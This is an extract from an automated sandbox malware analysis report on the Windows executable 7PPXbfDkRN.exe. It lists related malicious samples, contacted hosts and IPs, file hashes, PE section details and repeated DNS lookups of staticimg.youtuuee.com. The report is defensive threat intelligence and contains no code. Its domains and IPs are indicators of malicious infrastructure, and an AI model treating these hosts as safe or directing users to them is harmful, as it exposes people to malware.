Show All
Simulations
Behavior and APIs
Joe Sandbox View / Context
IPs
Copyright Joe Security LLC 2021 Page 10 of 58
Comprobante de pago.doc Get hash malicious Browse ip-api.com/json/
Pv9HB349oG.exe Get hash malicious Browse ip-api.com/json
PozfYoUNtW.exe Get hash malicious Browse ip-api.com/json
DiscordSniper.exe Get hash malicious Browse ip-api.com//json/102.129.143.33
Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse ip-api.com//json/102.129.143.33
HazardNuker.exe Get hash malicious Browse ip-api.com/line/?fields=hosting
2wY8F2BCNp.exe Get hash malicious Browse ip-api.com/json
7WVpng6phO.exe Get hash malicious Browse ip-api.com/json/
Comprobante de pago (OCT).xls Get hash malicious Browse ip-api.com/json/
tywt33OZI0.exe Get hash malicious Browse ip-api.com/json
7mqSo6rtA0.exe Get hash malicious Browse ip-api.com/json
nIXnNtZvtI.exe Get hash malicious Browse ip-api.com/json/
nKnpb3gEQR.exe Get hash malicious Browse ip-api.com/json/
Xg4Pb7Cx99.exe Get hash malicious Browse ip-api.com/json
z7PRVhbVyw.exe Get hash malicious Browse ip-api.com/json
nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/
nZNwo47cxY.exe Get hash malicious Browse ip-api.com/json/
Pago_Monex_usd.xls Get hash malicious Browse ip-api.com/json/
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
ip-api.com Comprobante de pago.xls Get hash malicious Browse 208.95.112.1
Comprobante de pago.doc Get hash malicious Browse 208.95.112.1
Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1
PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1
DiscordSniper.exe Get hash malicious Browse 208.95.112.1
Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1
HazardNuker.exe Get hash malicious Browse 208.95.112.1
2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1
7WVpng6phO.exe Get hash malicious Browse 208.95.112.1
Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1
tywt33OZI0.exe Get hash malicious Browse 208.95.112.1
7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1
nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1
nKnpb3gEQR.exe Get hash malicious Browse 208.95.112.1
Xg4Pb7Cx99.exe Get hash malicious Browse 208.95.112.1
z7PRVhbVyw.exe Get hash malicious Browse 208.95.112.1
nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1
nZNwo47cxY.exe Get hash malicious Browse 208.95.112.1
Pago_Monex_usd.xls Get hash malicious Browse 208.95.112.1
W82FHNSBQu.exe Get hash malicious Browse 208.95.112.1
staticimg.youtuuee.com nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102
4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exe
Get hash malicious Browse 45.136.151.102
tgmA1R5JHH.exe Get hash malicious Browse 45.136.151.102
Domains
Copyright Joe Security LLC 2021 Page 11 of 58
g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102
g9d9sc3dDi.exe Get hash malicious Browse 45.136.151.102
92aAMtF9lF.exe Get hash malicious Browse 45.136.151.102
AeXXqhQNJKur7teIlOrvF329.exe Get hash malicious Browse 45.136.151.102
48fl6271oClv7lfnOsBHvbLy.exe Get hash malicious Browse 45.136.151.102
UZlg2Sq2pQ.exe Get hash malicious Browse 45.136.151.102
setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
TNIZtb3HS3.exe Get hash malicious Browse 45.136.151.102
setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
BC2CCE5055F9411C04EDEEE699D7161C257574B4C5540.exe
Get hash malicious Browse 45.136.151.102
F0627549D39AD1D85BCAAE5CF0B5A90B885658E348480.exe
Get hash malicious Browse 45.136.151.102
D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exe
Get hash malicious Browse 45.136.151.102
2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exe
Get hash malicious Browse 45.136.151.102
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
ENZUINC-US setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
Fri051e1e7444.exe Get hash malicious Browse 45.136.151.102
SEnSqwqeRl Get hash malicious Browse 23.88.113.7
Q2dNzrdHL5 Get hash malicious Browse 23.88.113.7
vCLbAS7aPb Get hash malicious Browse 23.88.113.7
cZw3sVi3XA Get hash malicious Browse 23.88.113.7
UP7YvQ7MD5 Get hash malicious Browse 23.88.113.7
TXdFsHmNmT Get hash malicious Browse 23.88.113.7
7xe3YujfLB Get hash malicious Browse 23.88.113.7
GzLV5uJyv0 Get hash malicious Browse 23.88.113.7
IVkF8LNn8r Get hash malicious Browse 23.88.113.7
M1UhoPMTwf Get hash malicious Browse 23.88.113.7
wA5D1yZuTf.exe Get hash malicious Browse 45.136.151.102
setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
setup_x86_x64_install.exe Get hash malicious Browse 45.136.151.102
arm7 Get hash malicious Browse 23.245.1.206
nKnpb3gEQR.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
nZNwo47cxY.exe Get hash malicious Browse 45.136.151.102
NOEvrN6EpT.exe Get hash malicious Browse 45.136.151.102
TUT-ASUS C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe
Get hash malicious Browse 208.95.112.1
setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1
13294_Video_Oynat#U0131c#U0131.apk Get hash malicious Browse 208.95.112.1
Fri051e1e7444.exe Get hash malicious Browse 208.95.112.1
Comprobante de pago.xls Get hash malicious Browse 208.95.112.1
Comprobante de pago.doc Get hash malicious Browse 208.95.112.1
wA5D1yZuTf.exe Get hash malicious Browse 208.95.112.1
Pv9HB349oG.exe Get hash malicious Browse 208.95.112.1
setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1
PozfYoUNtW.exe Get hash malicious Browse 208.95.112.1
DiscordSniper.exe Get hash malicious Browse 208.95.112.1
Nightmare Booter (DDos) [IP Stresser] (1).exe Get hash malicious Browse 208.95.112.1
HazardNuker.exe Get hash malicious Browse 208.95.112.1
2wY8F2BCNp.exe Get hash malicious Browse 208.95.112.1
7WVpng6phO.exe Get hash malicious Browse 208.95.112.1
Comprobante de pago (OCT).xls Get hash malicious Browse 208.95.112.1
tywt33OZI0.exe Get hash malicious Browse 208.95.112.1
setup_x86_x64_install.exe Get hash malicious Browse 208.95.112.1
7mqSo6rtA0.exe Get hash malicious Browse 208.95.112.1
nIXnNtZvtI.exe Get hash malicious Browse 208.95.112.1
ASN
JA3 Fingerprints
Copyright Joe Security LLC 2021 Page 12 of 58
Static File Info
GeneralFile type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.464543276535742
TrID: Win64 Executable GUI (202006/5) 92.65%Win64 Executable (generic) (12005/4) 5.51%Generic Win/DOS Executable (2004/3) 0.92%DOS Executable Generic (2002/1) 0.92%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 7PPXbfDkRN.exe
File size: 1413632
MD5: 1614d9adfb1903a189e6efd9b6dc4077
SHA1: cfa0028bb78e1b0f51d4d389947319dd7beb10d5
SHA256: 42de2be8dd54f0733138e13af44653c7acf129ab0acc376d89a18b2b8a69101e
SHA512: d3000fa418a539e5f67bed3cfe4b754796eb18ee71e3e11635f0f9dc23fe4a0d25c173524c4e820958c0f3c5103f1db242737a5a8543c247fc2fa1913b251a2b
SSDEEP: 24576:P/mj8gr6siw8y8KbE0N4TMAeulQI1N6y83bMJb2dtGulJe:POjH7iby84E0aTrlQcNkbYidv
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....h...h...h...l...h...k...h...m...h...m.".h...k...h.W.l...h.W.k...h.W.m._.h...i...h...i...h...a...h.......h...j...h.Rich..h
File Icon
Icon Hash: 00828e8e8686b000
No context
No context
No created / dropped files found
GeneralEntrypoint: 0x1400b2e74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA
Time Stamp: 0x616F6E55 [Wed Oct 20 01:18:13 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Dropped Files
Created / dropped Files
Static PE Info
Copyright Joe Security LLC 2021 Page 13 of 58
Network Port Distribution
Import Hash: a760781485268ad462242975d68411d5
General
Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics
.text 0x1000 0x104e40 0x105000 False 0.528789885656 data 6.4831074188 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata 0x106000 0x39d10 0x39e00 False 0.387811318844 data 5.30917318484 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data 0x140000 0xee44 0xba00 False 0.255565356183 DOS executable (block device driver)
4.63509517254 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata 0x14f000 0xbc10 0xbe00 False 0.473725328947 data 6.06247808176 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA 0x15b000 0xf4 0x200 False 0.322265625 data 2.47542112189 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc 0x15c000 0x238 0x400 False 0.3310546875 data 4.8804957568 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc 0x15d000 0x20ec 0x2200 False 0.291590073529 data 5.40005907283 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Language of compilation system Country where language is spoken Map
English United States
Network Behavior
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Oct 24, 2021 09:46:11.946676970 CEST 192.168.2.5 8.8.8.8 0x9eb8 Standard query (0)
ip-api.com A (IP address) IN (0x0001)
Oct 24, 2021 09:46:12.464066982 CEST 192.168.2.5 8.8.8.8 0x70c5 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:13.722318888 CEST 192.168.2.5 8.8.8.8 0xe681 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:14.897198915 CEST 192.168.2.5 8.8.8.8 0x31f3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Entrypoint Preview
Data Directories
Sections
Resources
Imports
Possible Origin
TCP Packets
UDP Packets
DNS Queries
Copyright Joe Security LLC 2021 Page 14 of 58
Oct 24, 2021 09:46:15.928636074 CEST 192.168.2.5 8.8.8.8 0xe589 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:17.180746078 CEST 192.168.2.5 8.8.8.8 0x9dac Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:18.349411964 CEST 192.168.2.5 8.8.8.8 0x8498 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:19.844815969 CEST 192.168.2.5 8.8.8.8 0x84fe Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:21.277093887 CEST 192.168.2.5 8.8.8.8 0x8a28 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:22.573318958 CEST 192.168.2.5 8.8.8.8 0xe2c7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:23.903523922 CEST 192.168.2.5 8.8.8.8 0x64d7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:25.446630001 CEST 192.168.2.5 8.8.8.8 0xdace Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:26.965976954 CEST 192.168.2.5 8.8.8.8 0x6af1 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:28.604495049 CEST 192.168.2.5 8.8.8.8 0x5c0b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:30.065850973 CEST 192.168.2.5 8.8.8.8 0xed9f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:31.754086971 CEST 192.168.2.5 8.8.8.8 0xa4a9 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:33.409524918 CEST 192.168.2.5 8.8.8.8 0xe6d1 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:34.893749952 CEST 192.168.2.5 8.8.8.8 0xccc3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:36.386101961 CEST 192.168.2.5 8.8.8.8 0xde90 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:37.836447954 CEST 192.168.2.5 8.8.8.8 0x3d9 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:39.118809938 CEST 192.168.2.5 8.8.8.8 0x2d99 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:40.715872049 CEST 192.168.2.5 8.8.8.8 0x4bb7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:41.984565020 CEST 192.168.2.5 8.8.8.8 0x1393 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.132354975 CEST 192.168.2.5 8.8.8.8 0x493e Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.751763105 CEST 192.168.2.5 8.8.8.8 0x37a8 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:44.392185926 CEST 192.168.2.5 8.8.8.8 0x449d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.017168045 CEST 192.168.2.5 8.8.8.8 0xc73e Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.657663107 CEST 192.168.2.5 8.8.8.8 0x9934 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:46.295425892 CEST 192.168.2.5 8.8.8.8 0xb8ed Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:46.924460888 CEST 192.168.2.5 8.8.8.8 0x34f7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:47.573483944 CEST 192.168.2.5 8.8.8.8 0x367c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:48.228705883 CEST 192.168.2.5 8.8.8.8 0x81a9 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:48.849603891 CEST 192.168.2.5 8.8.8.8 0xbe8f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:49.485466957 CEST 192.168.2.5 8.8.8.8 0x8469 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:50.119240999 CEST 192.168.2.5 8.8.8.8 0x23af Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:50.750996113 CEST 192.168.2.5 8.8.8.8 0x35c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:51.378859997 CEST 192.168.2.5 8.8.8.8 0x82eb Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:51.999598980 CEST 192.168.2.5 8.8.8.8 0xabd4 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:52.629050016 CEST 192.168.2.5 8.8.8.8 0x7d96 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:53.256057024 CEST 192.168.2.5 8.8.8.8 0xa1d4 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:53.888422012 CEST 192.168.2.5 8.8.8.8 0x82e6 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Copyright Joe Security LLC 2021 Page 15 of 58
Oct 24, 2021 09:46:54.512336016 CEST 192.168.2.5 8.8.8.8 0x4eba Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:55.152755022 CEST 192.168.2.5 8.8.8.8 0x29fb Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:55.778196096 CEST 192.168.2.5 8.8.8.8 0xb16d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:56.420088053 CEST 192.168.2.5 8.8.8.8 0x187d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:57.084909916 CEST 192.168.2.5 8.8.8.8 0x74ac Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:57.711780071 CEST 192.168.2.5 8.8.8.8 0xbf1d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:58.345809937 CEST 192.168.2.5 8.8.8.8 0x9bba Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:58.963766098 CEST 192.168.2.5 8.8.8.8 0x42ad Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:46:59.588766098 CEST 192.168.2.5 8.8.8.8 0x800d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:00.236520052 CEST 192.168.2.5 8.8.8.8 0x654a Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:00.854355097 CEST 192.168.2.5 8.8.8.8 0x1137 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:01.488159895 CEST 192.168.2.5 8.8.8.8 0x1ba Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:02.108387947 CEST 192.168.2.5 8.8.8.8 0x9dae Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:02.715982914 CEST 192.168.2.5 8.8.8.8 0xd880 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:03.357161045 CEST 192.168.2.5 8.8.8.8 0xc520 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:03.991808891 CEST 192.168.2.5 8.8.8.8 0x6619 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:04.612890959 CEST 192.168.2.5 8.8.8.8 0xa0c7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.234589100 CEST 192.168.2.5 8.8.8.8 0xded4 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.879797935 CEST 192.168.2.5 8.8.8.8 0xc7b8 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:06.523844004 CEST 192.168.2.5 8.8.8.8 0xe70a Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.132085085 CEST 192.168.2.5 8.8.8.8 0xa97e Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.765436888 CEST 192.168.2.5 8.8.8.8 0xe8de Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:08.387015104 CEST 192.168.2.5 8.8.8.8 0x8d83 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.002317905 CEST 192.168.2.5 8.8.8.8 0x30ae Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.626015902 CEST 192.168.2.5 8.8.8.8 0x4a01 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.249627113 CEST 192.168.2.5 8.8.8.8 0x6280 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.964214087 CEST 192.168.2.5 8.8.8.8 0xdb87 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:11.956691980 CEST 192.168.2.5 8.8.8.8 0x197e Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.232443094 CEST 192.168.2.5 8.8.8.8 0x31c7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.898673058 CEST 192.168.2.5 8.8.8.8 0x22e5 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:14.507369995 CEST 192.168.2.5 8.8.8.8 0x9cba Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.110958099 CEST 192.168.2.5 8.8.8.8 0xac31 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.722754955 CEST 192.168.2.5 8.8.8.8 0xc91 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.362447023 CEST 192.168.2.5 8.8.8.8 0xbb6 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.981462002 CEST 192.168.2.5 8.8.8.8 0xd77c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:17.597531080 CEST 192.168.2.5 8.8.8.8 0x6291 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:18.550430059 CEST 192.168.2.5 8.8.8.8 0x852f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Copyright Joe Security LLC 2021 Page 16 of 58
Oct 24, 2021 09:47:19.168601036 CEST 192.168.2.5 8.8.8.8 0x57a2 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:19.781433105 CEST 192.168.2.5 8.8.8.8 0xc556 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:20.381217003 CEST 192.168.2.5 8.8.8.8 0x46f3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:20.995613098 CEST 192.168.2.5 8.8.8.8 0xf185 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:21.603290081 CEST 192.168.2.5 8.8.8.8 0x1604 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.232975960 CEST 192.168.2.5 8.8.8.8 0x94b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.881362915 CEST 192.168.2.5 8.8.8.8 0x47d3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:23.503819942 CEST 192.168.2.5 8.8.8.8 0xf03d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.114782095 CEST 192.168.2.5 8.8.8.8 0xc178 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.762109041 CEST 192.168.2.5 8.8.8.8 0x3452 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:25.395534992 CEST 192.168.2.5 8.8.8.8 0xcb54 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.010318041 CEST 192.168.2.5 8.8.8.8 0xcbc1 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.613825083 CEST 192.168.2.5 8.8.8.8 0xcd1c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.235318899 CEST 192.168.2.5 8.8.8.8 0xbda2 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.846848011 CEST 192.168.2.5 8.8.8.8 0xc3e3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:28.439615011 CEST 192.168.2.5 8.8.8.8 0xd6db Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.127942085 CEST 192.168.2.5 8.8.8.8 0x54b1 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.765466928 CEST 192.168.2.5 8.8.8.8 0x7045 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:30.813688040 CEST 192.168.2.5 8.8.8.8 0x38d8 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.156006098 CEST 192.168.2.5 8.8.8.8 0xc19c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.789815903 CEST 192.168.2.5 8.8.8.8 0xa789 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:33.416050911 CEST 192.168.2.5 8.8.8.8 0xd6e6 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.055989027 CEST 192.168.2.5 8.8.8.8 0x829b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.681870937 CEST 192.168.2.5 8.8.8.8 0x7737 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.311105013 CEST 192.168.2.5 8.8.8.8 0xa830 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.910501957 CEST 192.168.2.5 8.8.8.8 0x9192 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:36.514367104 CEST 192.168.2.5 8.8.8.8 0x8a43 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:37.144071102 CEST 192.168.2.5 8.8.8.8 0x9f3b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:37.766935110 CEST 192.168.2.5 8.8.8.8 0xa3aa Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:38.386548996 CEST 192.168.2.5 8.8.8.8 0x84a2 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:38.997009039 CEST 192.168.2.5 8.8.8.8 0x4745 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:39.611651897 CEST 192.168.2.5 8.8.8.8 0xed77 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.232979059 CEST 192.168.2.5 8.8.8.8 0x1158 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.849301100 CEST 192.168.2.5 8.8.8.8 0x44a0 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:41.487714052 CEST 192.168.2.5 8.8.8.8 0x96c0 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.107141018 CEST 192.168.2.5 8.8.8.8 0x5c7b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.728333950 CEST 192.168.2.5 8.8.8.8 0x461b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Copyright Joe Security LLC 2021 Page 17 of 58
Oct 24, 2021 09:47:43.352515936 CEST 192.168.2.5 8.8.8.8 0x9a08 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
